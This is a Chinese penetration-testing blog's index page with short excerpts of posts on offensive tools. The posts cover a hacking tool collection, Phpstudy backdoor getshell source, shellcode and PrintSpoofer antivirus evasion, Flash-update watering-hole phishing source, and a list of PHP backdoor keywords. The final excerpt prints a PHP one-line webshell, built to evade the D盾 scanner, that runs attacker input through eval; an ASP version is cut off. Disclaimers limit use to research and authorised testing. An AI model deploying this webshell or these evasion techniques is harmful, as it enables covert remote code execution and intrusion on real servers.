K8哥哥工具合集

小俊 | 渗透测试 | 2021-02-14
PS:工具仅供安全研究或授权渗透,非法用途后果自负。   目录: 提权工具 WebShell 漏洞利用 挂马工具 免杀工具 远控后门 扫描工具 其它工具   下载地址:https://github.com/k8gege/K8too [阅读全文]
ė201次浏览 60条评论 0 K8哥哥

Phpstudy后门getshell软件和源码

小俊 | 渗透测试 | 2021-02-13
很老的一个洞了,发出来了,Phpstudy后门getshell软件和源码。     需要下载联系博主QQ。 [阅读全文]
ė179次浏览 60条评论 0

从JS敏感信息泄露到GETSHELL

小俊 | 渗透测试 | 2021-02-07
正文 前端时间打HW,拿到一个IP,先在FOFA上搜一下 发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统 先从86端口这个系统入手,界面如图 没有验证码!我喜欢,掏出我的大宝贝300万大字典对着admin就是一顿爆,然而现实是残酷的。。。 搞不到弱密码,随手查看了一下源代码,发现这里登录成功跳转 [阅读全文]
ė165次浏览 60条评论 0

Shellcode混淆Bypass

小俊 | 渗透测试 | 2021-02-01
前言 在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit 环境: Cobalt strike 4.1 Python pyinstaller [阅读全文]
ė154次浏览 60条评论 0

PrintSpoofer免杀下载

小俊 | 渗透测试 | 2020-10-31
源码下载 https://github.com/whojeff/PrintSpoofer vs2019编译发现360全家桶查杀 2.免杀处理 printspoofer 将这个关键词替换成其他字符串 如 moonsec PrintSpoofer.cpp PrintSpoofer.h 全部改为 [阅读全文]
ė586次浏览 60条评论 0

XSS打击钓鱼网站

小俊 | 渗透测试 | 2020-10-05
朋友发来一个钓鱼站,抓包+xss即可绕过。 过程如下:   QQ号码处输入处输入正常号码,密码处输入payload,正常输入会有字符长度限制,burp抓包绕过一下就行。 成功拿下。 只做技术研究,误做非法操作。 [阅读全文]
ė828次浏览 60条评论 0

水坑攻击-Flash钓鱼弹窗优化版源码下载

小俊 | 渗透测试 | 2020-10-04
一直想写个界面精致点的Flash钓鱼,奈何各种效果实现起来实在是有点麻烦,正好发现了layer这个牛逼的弹层组件,一开始直接用的图片,几行代码就搞定了,但是还是不够完美,后来发到T00ls大家集思广益,提出了一些非常好的建议,几次修改后才有了如下的最终版。 在线预览:http://flash-pop.se7ensec.cn/ 有人说flas [阅读全文]
ė581次浏览 60条评论 0

一次对大马的简单分析产生的深思

小俊 | 渗透测试 | 2020-10-03
以下文章来源于t00ls 日常网络冲浪的时候接到任务,拿下目标服务器getshell了以后,发现了个奇怪的php文件,文件比较大,有200k,怀着好奇的心理,便访问了一下。 不失所望,是个大马,本着好奇心下载了下来,尝试爆破,爆破成功 功能还算是齐全,正打算收入囊中,一想到上次xxx事件,心有余悸。。 查看 [阅读全文]
ė616次浏览 60条评论 0

常见的后门关键词

小俊 | 渗透测试 | 2020-10-02
分享给那些安服的苦逼们: 系统命令执行: system, passthru, shell_exec, exec, popen, proc_open 代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 文件包含: require, requi [阅读全文]
ė489次浏览 60条评论 0

免杀D盾的PHP/ASP/ASPX一句话

小俊 | 渗透测试 | 2020-10-02
php: $m=$_GET[ $m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c); ($a.$b); ?> asp: <% P=request("pass") A=mid(P,1,1 [阅读全文]
ė403次浏览 60条评论 0

Ɣ回顶部